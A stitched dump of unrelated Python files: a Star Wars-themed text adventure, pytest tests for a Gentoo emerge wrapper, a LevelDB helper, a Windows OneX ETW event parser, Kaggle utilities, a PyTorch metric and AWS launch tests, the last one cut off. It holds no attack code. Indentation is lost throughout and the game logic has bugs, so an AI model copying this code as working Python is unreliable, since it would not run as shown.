print("'Brought you here to groan, I have not.' Why did Baby Yoda have to be so rude?")
sleep(2)
print("He tells you one last thing before sending you off...")
sleep(2)
print("'Next week, see us. Decide if you are yet worthy of a lightsaber, we then will.'")
def Tavern(item, money):
print("You are about to enter the next room when a man is thrown out of the door. He is knocked unconscious.")
choice = input("Do you search him for anything of value? y/n")
if choice =='y':
print("You search him and find 30 space credits in his space wallet.")
money+=80
else:
print("You decide it's best not to search someone while they're knocked out. You never know if they will wake up as you're doing it.")
print("You enter what is known as the stary sky tavern, the few patrons of the place already sat down and enjoying their drinks.")
#print('When you walk in an employee of the tavern walked up to you, asking you "Hello')
#print('maam, what are you here for?')
def tavern_menu(item,money):
""" THis is what this function is about"""
print('''Your options are you can
1. rent a room to rest(20SC).
2. order a drink (Which costs 5SC) and
3. order a meal (Which costs 10 SC)
4.You can even ponder why you are here''')
choice=input("So what would you like? (press 0 to leave to another destination)")
if choice == 1:
if money > 19:
print("You are handed a key, walking to the room that key unlocks. You lay down and rest")
else:
print ("You realize you don't have enough money and reconsider your choice")
tavern_menu(item,money)
elif choice == 2:
if money > 4:
print("You buy a drink, taking a seat and chugging it down. You would gain some kind of drunk status effect if I knew how to write one.")
else:
print("You realize you don't have enough money and reconsider your choice")
tavern_menu(item,money)
elif choice==3:
if money > 14:
print("You enjoy a hefty meal, devouring it. You can't remember the last time you ate, the last time you actually ate was a terrible mint chip muffin.")
else:
print("You realize you don't have enough money and reconsider your choice")
tavern_menu(item,money)
'''
elif choice == 4:
print("You say that you choose to ponder, the employee giving you something to ponder on and asks")
print("You ever wonder why were here?")
print("""You respond with"" It's one of life's great mysteries isn't it? Why are we here? I mean, are we the product of some cosmic coincidence, or is there really a God watching everything? You know, with a plan for us and stuff. I don't know, but it keeps me up at night.""")
print("They just stare at you, a bit weirded out""No I mean at this station... so... is there anything you'd actually like?" ")
tavern_menu(item,money)
else:
print("You decide to just leave and not do anything, leaving after saying goodbye")
intro(item,money)'''
def bell_room(item,money):
print("you enter a room with a sign above it saying the you will die room. You are but a small bell who is stupid enough to enter.")
sleep(2)
print("you go in and a voice says answer my riddle and you won't die")
sleep(2)
print("I speak without a mouth and hear without ears. I have no body, but I come alive with wind. What am I?")
sleep(2)
print("a(n) what")
sleep(2)
choice = input("Make a choice")
if choice == ' an echo':
print('you have been spared and walk out of the room safely')
else:
print("you got it wrong you run for the door and somehow make it out safely but lost 3 fingers")
def miles(item,money):
print("you fall into a hole of some kind and see lots of strange writing.")
sleep(2)
choice = input("do you traslate the writing? y/n ")
sleep(2)
if choice == 'y':
print("you pull out you trusty transalator and hold it up to the writing. It translates to Joe Mamma")
else:
print("You climb out the hole and pretend nothing happend. You wounder why the writing looked familiar")
def trivia(item,money):
counter = 1
points = 0
while True:
print("You have",points,"points")
triviaurl = 'https://opentdb.com/api.php?amount=1&difficulty=easy&type=multiple'
response = urllib.request.urlopen(triviaurl)
result = json.loads(response.read())
#print(result)
questions = []
questions.append(result["results"][0]["correct_answer"])
for wrong in result["results"][0]["incorrect_answers"]:
questions.append(wrong)
random.shuffle(questions)
print("Question",counter)
counter += 1
print(result["results"][0]["question"])
print("Your options are:")
for item in questions:
print(item)
choice = input("What is your answer?")
if choice.lower() == result["results"][0]["correct_answer"].lower():
print("You are right!")
points += 1
money += 5
else:
print("You are wrong")
print("The correct answer is:",result["results"][0]["correct_answer"])
print("You lose 2 SC")
print(f"You have {money}SC")
points -= 1
money -= 2
choice = input("Play again? y/n")
if choice == 'n':
break
intro(item,money)
intro(item,money)
|
from unittest.mock import patch
from pytest import mark
@mark.parametrize('return_code, pretend, world', [(b'0', False, False), (b'0', True, False),
(b'0', True, True), (b'1', False, False),
(b'1', False, True), (b'1', True, False),
(b'1', True, True)])
def test_deep_clean_not_run(return_code, pretend, world):
from argparse import Namespace
with patch('pyerge.tmerge.check_emerge_opts') as check_emerge_opts_mock, \
patch('pyerge.tmerge.emerge') as emerge_mock, \
patch('pyerge.tmerge.deep_run') as deep_run_mock:
from pyerge import tmerge
check_emerge_opts_mock.return_value = (pretend, world)
tmerge.deep_clean([''], Namespace(), return_code)
emerge_mock.assert_not_called()
deep_run_mock.assert_not_called()
def test_deep_clean_run():
from argparse import Namespace
with patch('pyerge.tmerge.check_emerge_opts') as check_emerge_opts_mock, \
patch('pyerge.tmerge.emerge') as emerge_mock, \
patch('pyerge.tmerge.deep_run') as deep_run_mock:
from pyerge import tmerge
opts = Namespace()
output_and_rc = b'0'
check_emerge_opts_mock.return_value = (False, True)
emerge_mock.return_value = (output_and_rc, output_and_rc)
tmerge.deep_clean([''], opts, output_and_rc)
emerge_mock.assert_called_once_with(['-pc'], build=False)
deep_run_mock.assert_called_once_with(opts, output_and_rc)
def test_deep_run_not_selected():
from argparse import Namespace
with patch('pyerge.tmerge.emerge') as emerge_mock:
from pyerge import tmerge
tmerge.deep_run(opts=Namespace(deep_run=False), output=b'')
emerge_mock.assert_not_called()
def test_deep_run_wrong_output():
from argparse import Namespace
with patch('pyerge.tmerge.emerge') as emerge_mock:
from pyerge import tmerge
tmerge.deep_run(opts=Namespace(deep_run=True), output=b'All selected packages: ')
emerge_mock.assert_not_called()
def test_deep_run_output_with_two_packages():
from argparse import Namespace
with patch('pyerge.tmerge.emerge') as emerge_mock:
from pyerge import tmerge
output = b'\n\nAll selected packages: =sys-kernel/gentoo-sources-5.10.76-r1 =dev-python/hypothesis-6.27.1\n\n'
opts = Namespace(deep_run=True)
tmerge.deep_run(opts=opts, output=output)
emerge_mock.assert_called_once_with(['-c', '=dev-python/hypothesis-6.27.1'], build=True)
def test_deep_run_output_with_only_gentoo():
from argparse import Namespace
with patch('pyerge.tmerge.emerge') as emerge_mock:
from pyerge import tmerge
output = b'\n\nAll selected packages: =sys-kernel/gentoo-sources-5.10.76-r1\n\n'
opts = Namespace(deep_run=True)
tmerge.deep_run(opts=opts, output=output)
emerge_mock.assert_not_called()
@mark.parametrize('list_str, result', [(['--pretend', '--verbose', '--newuse', '--deep', '--update', '@world'], (True, True)),
(['--pretend', '--verbose', 'conky'], (True, False)),
(['-f', 'conky'], (False, False)),
(['', '@world'], (False, True)),
(['', 'conky'], (False, False))])
def test_check_emerge_opts(list_str, result):
from pyerge import tmerge
assert tmerge.check_emerge_opts(list_str) == result
def test_is_portage_running():
from pyerge import tmerge
with patch('pyerge.tmerge.utils') as utils_mock:
utils_mock.run_cmd.return_value = (b'3456\n', b'')
assert tmerge.is_portage_running() is True
utils_mock.run_cmd.assert_called_once_with('pgrep -f /usr/bin/emerge')
def test_is_portage_not_running():
from pyerge import tmerge
with patch('pyerge.tmerge.utils') as utils_mock:
utils_mock.run_cmd.return_value = (b'', b'')
assert tmerge.is_portage_running() is False
utils_mock.run_cmd.assert_called_once_with('pgrep -f /usr/bin/emerge')
def test_run_emerge():
from argparse import Namespace
with patch('pyerge.tmerge.emerge') as emerge_mock, \
patch('pyerge.tmerge.post_emerge') as post_emerge_mock, \
patch('pyerge.tmerge.deep_clean') as deep_clean:
ret_code = b'0'
emerge_mock.return_value = (ret_code, b'')
from pyerge import tmerge
emerge_opts = ['-NDu', '@world']
opts = Namespace(action='emerge', online=True, deep_print=True)
tmerge.run_emerge(emerge_opts=emerge_opts, opts=opts)
post_emerge_mock.assert_called_once_with(emerge_opts, ret_code)
deep_clean.assert_called_once_with(emerge_opts, opts, ret_code)
def test_run_check():
from argparse import Namespace
with patch('pyerge.tmerge.check_upd') as check_upd_mock:
from pyerge import tmerge
opts = Namespace(action='check', local=True, online=True)
tmerge.run_check(opts)
check_upd_mock.assert_called_once_with(opts.local)
|
from contextlib import contextmanager
from inspect import currentframe, getargvalues
import plyvel
@contextmanager
def open_leveldb(name,
create_if_missing=False,
error_if_exists=False,
paranoid_checks=None,
write_buffer_size=None,
max_open_files=None,
lru_cache_size=None,
block_size=None,
block_restart_interval=None,
compression='snappy',
bloom_filter_bits=0,
comparator=None,
comparator_name=None):
"""Context manager for plyvel leveldb interface.
See plyvel.DB.__init__ documentation to learn more about args.
"""
_, _, _, kwargs = getargvalues(currentframe())
db = plyvel.DB(**kwargs)
try:
yield db
finally:
db.close()
|
# -*- coding: utf-8 -*-
"""
Microsoft-Windows-OneX
GUID : ab0d8ef9-866d-4d39-b83f-453f3b8f6325
"""
from construct import Int8sl, Int8ul, Int16ul, Int16sl, Int32sl, Int32ul, Int64sl, Int64ul, Bytes, Double, Float32l, Struct
from etl.utils import WString, CString, SystemTime, Guid
from etl.dtyp import Sid
from etl.parsers.etw.core import Etw, declare, guid
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=1, version=0)
class Microsoft_Windows_OneX_1_0(Etw):
pattern = Struct(
"PortId" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=2, version=0)
class Microsoft_Windows_OneX_2_0(Etw):
pattern = Struct(
"PortId" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=3, version=0)
class Microsoft_Windows_OneX_3_0(Etw):
pattern = Struct(
"PortId" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=4, version=0)
class Microsoft_Windows_OneX_4_0(Etw):
pattern = Struct(
"PortId" / Int32ul,
"WinError" / Int32ul,
"ReasonCode" / Int32ul,
"EAPMethodType" / Int8ul,
"RootCauseString" / WString
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=5, version=0)
class Microsoft_Windows_OneX_5_0(Etw):
pattern = Struct(
"PortId" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=6, version=0)
class Microsoft_Windows_OneX_6_0(Etw):
pattern = Struct(
"PortId" / Int32ul,
"WinError" / Int32ul,
"ReasonCode" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=7, version=0)
class Microsoft_Windows_OneX_7_0(Etw):
pattern = Struct(
"PortId" / Int32ul,
"UserDataSize" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=8, version=0)
class Microsoft_Windows_OneX_8_0(Etw):
pattern = Struct(
"PortId" / Int32ul,
"UserDataSize" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=9, version=0)
class Microsoft_Windows_OneX_9_0(Etw):
pattern = Struct(
"PortId" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=10, version=0)
class Microsoft_Windows_OneX_10_0(Etw):
pattern = Struct(
"PortId" / Int32ul,
"Response" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=11, version=0)
class Microsoft_Windows_OneX_11_0(Etw):
pattern = Struct(
"PortId" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=12, version=0)
class Microsoft_Windows_OneX_12_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"Location" / Int32ul,
"Context" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=13, version=0)
class Microsoft_Windows_OneX_13_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"Location" / Int32ul,
"Context" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=14, version=0)
class Microsoft_Windows_OneX_14_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"Location" / Int32ul,
"Context" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=15, version=0)
class Microsoft_Windows_OneX_15_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"Location" / Int32ul,
"Context" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=16, version=0)
class Microsoft_Windows_OneX_16_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"Location" / Int32ul,
"Context" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=17, version=0)
class Microsoft_Windows_OneX_17_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"Location" / Int32ul,
"Context" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=18, version=0)
class Microsoft_Windows_OneX_18_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"Location" / Int32ul,
"Context" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=19, version=0)
class Microsoft_Windows_OneX_19_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"Location" / Int32ul,
"Context" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=20, version=0)
class Microsoft_Windows_OneX_20_0(Etw):
pattern = Struct(
"PortId" / Int32ul,
"UIRequestCode" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=21, version=0)
class Microsoft_Windows_OneX_21_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"Location" / Int32ul,
"Context" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=22, version=0)
class Microsoft_Windows_OneX_22_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"Location" / Int32ul,
"Context" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=23, version=0)
class Microsoft_Windows_OneX_23_0(Etw):
pattern = Struct(
"PortId" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=24, version=0)
class Microsoft_Windows_OneX_24_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"Location" / Int32ul,
"Context" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=25, version=0)
class Microsoft_Windows_OneX_25_0(Etw):
pattern = Struct(
"WarningCode" / Int32ul,
"Location" / Int32ul,
"Context" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=26, version=0)
class Microsoft_Windows_OneX_26_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"Location" / Int32ul,
"Context" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=27, version=0)
class Microsoft_Windows_OneX_27_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"Location" / Int32ul,
"Context" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=28, version=0)
class Microsoft_Windows_OneX_28_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"Location" / Int32ul,
"Context" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=29, version=0)
class Microsoft_Windows_OneX_29_0(Etw):
pattern = Struct(
"EAPMethodType" / Int8ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=30, version=0)
class Microsoft_Windows_OneX_30_0(Etw):
pattern = Struct(
"EAPMethodType" / Int8ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=31, version=0)
class Microsoft_Windows_OneX_31_0(Etw):
pattern = Struct(
"ProfilesCount" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=32, version=0)
class Microsoft_Windows_OneX_32_0(Etw):
pattern = Struct(
"EAPMethodType" / Int8ul,
"AuthMode" / WString
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=33, version=0)
class Microsoft_Windows_OneX_33_0(Etw):
pattern = Struct(
"EAPMethodType" / Int8ul,
"MediaType" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=34, version=0)
class Microsoft_Windows_OneX_34_0(Etw):
pattern = Struct(
"PortId" / Int32ul,
"UIRequestCode" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=35, version=0)
class Microsoft_Windows_OneX_35_0(Etw):
pattern = Struct(
"ChangeType" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=36, version=0)
class Microsoft_Windows_OneX_36_0(Etw):
pattern = Struct(
"PortId" / Int32ul,
"FriendlyName" / WString
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=37, version=0)
class Microsoft_Windows_OneX_37_0(Etw):
pattern = Struct(
"PortId" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=38, version=0)
class Microsoft_Windows_OneX_38_0(Etw):
pattern = Struct(
"PortId" / Int32ul,
"UIRequestCode" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=39, version=0)
class Microsoft_Windows_OneX_39_0(Etw):
pattern = Struct(
"PortId" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=40, version=0)
class Microsoft_Windows_OneX_40_0(Etw):
pattern = Struct(
"PortId" / Int32ul,
"PacketLength" / Int16ul,
"PacketType" / Int32ul,
"Identifier" / Int8ul,
"EapMethodType" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=41, version=0)
class Microsoft_Windows_OneX_41_0(Etw):
pattern = Struct(
"PortId" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=42, version=0)
class Microsoft_Windows_OneX_42_0(Etw):
pattern = Struct(
"PortId" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=43, version=0)
class Microsoft_Windows_OneX_43_0(Etw):
pattern = Struct(
"PortId" / Int32ul,
"Reason" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=44, version=0)
class Microsoft_Windows_OneX_44_0(Etw):
pattern = Struct(
"PortId" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=45, version=0)
class Microsoft_Windows_OneX_45_0(Etw):
pattern = Struct(
"PortId" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=46, version=0)
class Microsoft_Windows_OneX_46_0(Etw):
pattern = Struct(
"PortId" / Int32ul,
"TimeTaken" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=47, version=0)
class Microsoft_Windows_OneX_47_0(Etw):
pattern = Struct(
"PortId" / Int32ul,
"AuthIdentity" / WString,
"SessionId" / Int32ul,
"Username" / WString,
"Domain" / WString
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=48, version=0)
class Microsoft_Windows_OneX_48_0(Etw):
pattern = Struct(
"PortId" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=49, version=0)
class Microsoft_Windows_OneX_49_0(Etw):
pattern = Struct(
"PortId" / Int32ul,
"Reason" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=50, version=0)
class Microsoft_Windows_OneX_50_0(Etw):
pattern = Struct(
"PortId" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=51, version=0)
class Microsoft_Windows_OneX_51_0(Etw):
pattern = Struct(
"PortId" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=52, version=0)
class Microsoft_Windows_OneX_52_0(Etw):
pattern = Struct(
"PortId" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=53, version=0)
class Microsoft_Windows_OneX_53_0(Etw):
pattern = Struct(
"PortId" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=54, version=0)
class Microsoft_Windows_OneX_54_0(Etw):
pattern = Struct(
"PortId" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=55, version=0)
class Microsoft_Windows_OneX_55_0(Etw):
pattern = Struct(
"PortId" / Int32ul,
"SessionId" / Int32ul,
"UIRequestSessionId" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=56, version=0)
class Microsoft_Windows_OneX_56_0(Etw):
pattern = Struct(
"PortId" / Int32ul,
"Size" / Int32ul,
"SessionId" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=57, version=0)
class Microsoft_Windows_OneX_57_0(Etw):
pattern = Struct(
"PortId" / Int32ul,
"Reason" / Int32ul,
"SessionId" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=58, version=0)
class Microsoft_Windows_OneX_58_0(Etw):
pattern = Struct(
"PortId" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=59, version=0)
class Microsoft_Windows_OneX_59_0(Etw):
pattern = Struct(
"PortId" / Int32ul,
"WinError" / Int32ul,
"ReasonCode" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=60, version=0)
class Microsoft_Windows_OneX_60_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"Location" / Int32ul,
"Context" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=61, version=0)
class Microsoft_Windows_OneX_61_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"Location" / Int32ul,
"Context" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=62, version=0)
class Microsoft_Windows_OneX_62_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"Location" / Int32ul,
"Context" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=63, version=0)
class Microsoft_Windows_OneX_63_0(Etw):
pattern = Struct(
"Result" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=64, version=0)
class Microsoft_Windows_OneX_64_0(Etw):
pattern = Struct(
"PortId" / Int32ul,
"PacketLength" / Int16ul,
"PacketType" / Int32ul,
"Identifier" / Int8ul,
"EapMethodType" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=65, version=0)
class Microsoft_Windows_OneX_65_0(Etw):
pattern = Struct(
"PortId" / Int32ul,
"Identity" / CString
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=66, version=0)
class Microsoft_Windows_OneX_66_0(Etw):
pattern = Struct(
"PortId" / Int32ul,
"ExplicitCredentials" / Int8ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=68, version=0)
class Microsoft_Windows_OneX_68_0(Etw):
pattern = Struct(
"PortId" / Int32ul,
"ExplicitCredentials" / Int8ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=70, version=0)
class Microsoft_Windows_OneX_70_0(Etw):
pattern = Struct(
"PortId" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=60001, version=0)
class Microsoft_Windows_OneX_60001_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"Location" / Int32ul,
"Context" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=60002, version=0)
class Microsoft_Windows_OneX_60002_0(Etw):
pattern = Struct(
"WarningCode" / Int32ul,
"Location" / Int32ul,
"Context" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=60003, version=0)
class Microsoft_Windows_OneX_60003_0(Etw):
pattern = Struct(
"NextState" / Int8ul,
"Context" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=60004, version=0)
class Microsoft_Windows_OneX_60004_0(Etw):
pattern = Struct(
"Context" / Int32ul,
"UpdateReasonCode" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=60101, version=0)
class Microsoft_Windows_OneX_60101_0(Etw):
pattern = Struct(
"SourceAddress" / Int32ul,
"SourcePort" / Int32ul,
"DestinationAddress" / Int32ul,
"DestinationPort" / Int32ul,
"Protocol" / Int32ul,
"ReferenceContext" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=60102, version=0)
class Microsoft_Windows_OneX_60102_0(Etw):
pattern = Struct(
"SourcePort" / Int32ul,
"DestinationPort" / Int32ul,
"Protocol" / Int32ul,
"ReferenceContext" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=60103, version=0)
class Microsoft_Windows_OneX_60103_0(Etw):
pattern = Struct(
"IfGuid" / Guid,
"IfIndex" / Int32ul,
"IfLuid" / Int64ul,
"ReferenceContext" / Int32ul
)
|
import os
import numpy as np
import pandas as pd
def find_emb_dim(ratio, max_emb, data):
dim = round(np.unique(data).shape[0] * ratio)
if dim > max_emb:
return max_emb
else:
return dim
def post_process(pred):
# simple post processing
if pred > 1:
return 1
elif pred < 0:
return 0
else:
return float(pred)
def post_softmax(preds):
return None
def write_output(preds, conf):
if not os.path.exists(conf.path.output_path):
os.mkdir(conf.path.output_path)
test = pd.read_csv(os.path.join(conf.path.input_path, "test.csv.zip"), nrows = conf.data_prep.nrows)
sub = pd.DataFrame(test.item_id)
sub["deal_probability"] = preds.flatten()
sub.deal_probability = sub.deal_probability.map(lambda x: post_process(x))
print("writing csv yo...")
sub_path = os.path.join(conf.path.output_path, "submission.csv")
sub.to_csv(sub_path, index = False)
def plot_history(hist, conf, preds ,target ,save=False):
import matplotlib.pyplot as plt
import seaborn as sns
f, (ax1, ax2) = plt.subplots(1, 2, figsize = (12, 4))
ax1.plot(hist.history['rmse'], lw=2.0, color='b', label='train')
ax1.plot(hist.history['val_rmse'], lw=2.0, color='r', label='val')
ax1.set_title('CNN extra features')
ax1.set_xlabel('Epochs')
ax1.set_ylabel('rmse')
ax1.legend(loc='upper right')
ax2.plot(hist.history['loss'], lw=2.0, color='b', label='train')
ax2.plot(hist.history['val_loss'], lw=2.0, color='r', label='val')
ax2.set_title('CNN extra features')
ax2.set_xlabel('Epochs')
ax2.set_ylabel('loss')
ax2.legend(loc='upper right')
preds = preds.flatten()
f2, (ax1, ax2) = plt.subplots(1, 2, figsize = (12, 4))
pp = np.vectorize(post_process)
sns.distplot(preds, hist= True, label = "preds", ax = ax1)
sns.distplot([post_process(p) for p in preds], hist= True, label = "preds", ax = ax2)
sns.distplot(target, hist= True , label = "train", ax = ax2)
ax1.set_title('Distri raw')
ax1.set_xlabel('n obs')
ax1.set_ylabel('proba')
ax2.set_title('Distri post')
ax2.set_xlabel('n obs')
ax2.set_ylabel('proba')
ax2.legend(loc='upper right')
if save:
f.savefig(os.path.join(conf.path.output_path, "training_plot.pdf"))
f2.savefig(os.path.join(conf.path.output_path, "dist_plot.pdf"))
else:
f.show()
f2.show() |
from torch import Tensor
import torch
from src.schema import Metric
def get_metric(query_set: Tensor, support_set: Tensor, metric: Metric) -> Tensor:
"""
run metrics with name
Args:
query_set: the train/input feature space from encoder
support_set: the support set feature space from encoder
metric: the name of metric distance algo
Returns: the loss between spaces
"""
if metric == Metric.L2:
return l2(query_set, support_set)
if metric == Metric.Cosine:
return cosine(query_set, support_set)
raise NotImplementedError(f'not supported metric<{metric}>')
def l2(x: Tensor, y: Tensor) -> Tensor:
return torch.pow(x - y, 2)
def cosine(x: Tensor, y: Tensor) -> Tensor:
return torch.cosine_similarity(x, y, dim=-1) |
import unittest
from pympcam.coralManager import CoralManager
class TestCoralManagerMethods(unittest.TestCase):
def setUp(self) -> None:
self.coral = CoralManager()
return super().setUp()
def test_on(self):
self.assertTrue(self.coral.turnOn())
def test_off(self):
self.coral.turnOff()
|
import pytest
import yaml
import launch
import launch.cli
import launch.config
import launch.util
import test_util.aws
def test_aws_cf_simple(check_cli_success, aws_cf_config_path):
"""Test that required parameters are consumed and appropriate output is generated
"""
info, desc = check_cli_success(aws_cf_config_path)
# check AWS specific info
assert 'stack_id' in info
assert info['ssh_private_key'] == launch.util.MOCK_SSH_KEY_DATA
# key should not have been generated
assert 'key_name' not in info['temp_resources']
def test_aws_zen_cf_simple(check_cli_success, aws_zen_cf_config_path):
"""Test that required parameters are consumed and appropriate output is generated
"""
info, desc = check_cli_success(aws_zen_cf_config_path)
# check AWS specific info
assert 'stack_id' in info
assert 'vpc' in info['temp_resources']
assert 'gateway' in info['temp_resources']
assert 'private_subnet' in info['temp_resources']
assert 'public_subnet' in info['temp_resources']
def mock_stack_not_found(*args):
raise Exception('Mock stack was not found!!!')
def test_missing_aws_stack(aws_cf_config_path, monkeypatch):
""" Tests that clean and appropriate errors will be raised
